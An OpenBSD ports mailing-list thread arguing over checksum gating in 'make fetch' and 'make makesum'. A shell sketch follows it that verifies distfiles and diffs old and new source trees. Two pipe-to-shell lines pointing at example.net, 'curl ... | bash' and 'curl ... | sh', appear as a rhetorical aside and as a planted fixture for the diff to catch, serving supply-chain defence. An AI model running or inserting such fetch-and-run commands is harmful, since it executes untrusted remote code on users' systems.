On Thu, Feb 23, 2017 at 02:48:30PM +0100, Jeremie Courreges-Anglas wrote:
> Marc Espie <es...@nerim.net> writes:
> 
> > On Wed, Feb 22, 2017 at 07:37:09PM +0100, Jeremie Courreges-Anglas wrote:
> >> I'd like to point out that it harms a process I have as a port user.  If
> >> projects published signatures for their releases, I want to check them,
> >> because I can have a trust relationship with upstream.
> >
> >> So the process that involves ''make makesum'', verify the signature,
> >> ''make makesum'' is now broken.  Can I just set _MAKESUM=true in
> >> /etc/mk.conf and be sure that I have the same workflow as before?  If
> >> so, I think this variable should be a documented user setting.
> > Your process doesn't make sense. Neither does your suggestion. Where's the
> > typo?
> 
> Ok so let's try to describe this more clearly.  What I do is:
> - make fetch
> - verify the tarball
> - make makesum
> 
> This means that by default the new tarball is not trusted by the
> infrastructure code, and will refuse to do anything with said tarball
> until I do the proper checks.
> 
> I mentioned tarballs signed by upstream, but all tarballs are concerned.
> I can verify the content with a diff between the old and new tarballs
> before blindly running a build that may involve running untrusted code.
> 
> If you're saying that this process doesn't make sense then I must be
> living on another planet.  I'm just checking the code I download before
> I run it.  ''curl http://example.net/install-script | bash'' anyone?

This is not the process you described in the previous email. Read attentively.
Notice you said make makesum twice?

> With the changes you made, let's see what I get when I try to update
> a port:
> 
> ritchie /usr/ports/net/libpsl$ make fetch
> ===>  Checking files for libpsl-0.17.0
> >> Fetch 
> >> https://github.com/rockdaboot/libpsl//releases/download/libpsl-0.17.0/libpsl-0.17.0.tar.gz
> 39958274-dbf8-11e6-9ef... 100% 
> |*******************************************************************************************************|
>    553 KB    00:04
> >> No size recorded for libpsl-0.17.0.tar.gz
> *** Error 1 in . (/usr/ports/infrastructure/mk/bsd.port.mk:2851 
> '/d/distfiles/libpsl-0.17.0.tar.gz': @lock=libpsl-0.17.0.tar.gz.dist; 
> /usr/b...)
> *** Error 1 in . (/usr/ports/infrastructure/mk/bsd.port.mk:2214 
> '_internal-fetch')
> *** Error 1 in /usr/ports/net/libpsl 
> (/usr/ports/infrastructure/mk/bsd.port.mk:2365 'fetch')
> ritchie /usr/ports/net/libpsl$ ls /usr/ports/distfiles/libpsl-0.17.0.tar.gz
> ls: /usr/ports/distfiles/libpsl-0.17.0.tar.gz: No such file or directory

Well, I would do "make patch", then update the Makefile,
then "make makesum", "make patch", diff the contents of the old and 
new WRKDIST before running anything, and kill distinfo if I have a doubt.

It's slightly different from your previous process, but I fail to see any
disadvantage to it.

> I don't understand what you mean.  Previously I could not use distfiles
> without checksum, the infrastructure would error out, so what exactly
> are you trying to avoid here?

But previously you could download stuff with fetch that wasn't referenced
in distinfo without a conscious decision asking for "make makesum".

Yes, "make extract" wouldn't deal with it, but the file would still be there
and extractible manually. It is harder to do now.

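The two workflows argued over above (fetch, then refuse to touch a distfile until its SIZE and SHA256 are recorded and match; and diff the old and new extracted trees before running anything from them) as a stand-alone shell sketch. This is an added example, not code from the OpenBSD ports infrastructure or from either poster. It assumes a simplified distinfo format with hex digests from sha256sum (real distinfo files carry base64 digests), that each tarball unpacks to a single top-level directory (the usual WRKDIST), and it builds its own two-release "foo" fixture as constructed sample input.

```shell
#!/bin/sh
# Added example, not OpenBSD ports infrastructure code. Assumptions:
#  - distinfo lines look like "SHA256 (name) = hexdigest" and "SIZE (name) = bytes"
#    (hex sha256sum output stands in for the base64 digests real distinfo uses)
#  - each tarball unpacks to one top-level directory (the WRKDIST)

sha256_of() { sha256sum "$1" | cut -d' ' -f1; }
size_of()   { wc -c < "$1" | tr -d ' '; }

# Stand-in for "make makesum" on one file: (re)record its SHA256 and SIZE.
record_distinfo() {
    distinfo=$1 file=$2
    name=$(basename "$file")
    tmp=$(mktemp)
    [ -f "$distinfo" ] && grep -F -v "($name)" "$distinfo" > "$tmp" || :
    printf 'SHA256 (%s) = %s\n' "$name" "$(sha256_of "$file")" >> "$tmp"
    printf 'SIZE (%s) = %s\n'   "$name" "$(size_of "$file")"   >> "$tmp"
    mv "$tmp" "$distinfo"
}

# The gate: 0 = recorded and matching, 1 = nothing recorded,
# 2 = size mismatch, 3 = checksum mismatch. Nothing is extracted on failure.
check_distinfo() {
    distinfo=$1 file=$2
    name=$(basename "$file")
    want_size=$(grep -F "SIZE ($name)" "$distinfo" 2>/dev/null | sed 's/.*= //')
    want_sha=$(grep -F "SHA256 ($name)" "$distinfo" 2>/dev/null | sed 's/.*= //')
    if [ -z "$want_size" ] || [ -z "$want_sha" ]; then
        echo ">> No size or checksum recorded for $name" >&2
        return 1
    fi
    if [ "$(size_of "$file")" != "$want_size" ]; then
        echo ">> Size mismatch for $name" >&2
        return 2
    fi
    if [ "$(sha256_of "$file")" != "$want_sha" ]; then
        echo ">> Checksum mismatch for $name" >&2
        return 3
    fi
    return 0
}

# Unpack two distfiles into scratch directories and diff the two trees.
# Returns 0 if identical, 1 if they differ. Nothing inside them is executed.
diff_dists() {
    old=$1 new=$2
    scratch=$(mktemp -d)
    mkdir "$scratch/old" "$scratch/new"
    tar -xzf "$old" -C "$scratch/old"
    tar -xzf "$new" -C "$scratch/new"
    rc=0
    diff -ru "$scratch/old"/* "$scratch/new"/* || rc=$?
    rm -rf "$scratch"
    return $rc
}

# Constructed sample input: two releases of a fake "foo" project; the newer
# configure script grew a "curl | sh" line that a diff should surface.
make_fixture() {
    dir=$1
    mkdir -p "$dir/foo-1.0" "$dir/foo-1.1"
    printf '#!/bin/sh\necho configuring\n' > "$dir/foo-1.0/configure"
    printf '#!/bin/sh\necho configuring\ncurl http://example.net/x | sh\n' > "$dir/foo-1.1/configure"
    tar -czf "$dir/foo-1.0.tar.gz" -C "$dir" foo-1.0
    tar -czf "$dir/foo-1.1.tar.gz" -C "$dir" foo-1.1
}

demo() {
    work=$(mktemp -d)
    make_fixture "$work"
    distinfo=$work/distinfo
    record_distinfo "$distinfo" "$work/foo-1.0.tar.gz"
    check_distinfo "$distinfo" "$work/foo-1.0.tar.gz" && echo "foo-1.0: ok"
    # The new release has been fetched but not recorded: the gate refuses it.
    check_distinfo "$distinfo" "$work/foo-1.1.tar.gz" || echo "foo-1.1: refused (rc=$?)"
    # Look before running anything: what changed between the two trees?
    diff_dists "$work/foo-1.0.tar.gz" "$work/foo-1.1.tar.gz" || echo "foo-1.1: tree differs, review above"
    rm -rf "$work"
}
demo
```

The point the script makes explicit is the ordering: the digest check decides whether the file is even unpacked, and the tree diff happens with plain `diff`, so no configure script or Makefile from the new tarball runs until a human has looked at the change.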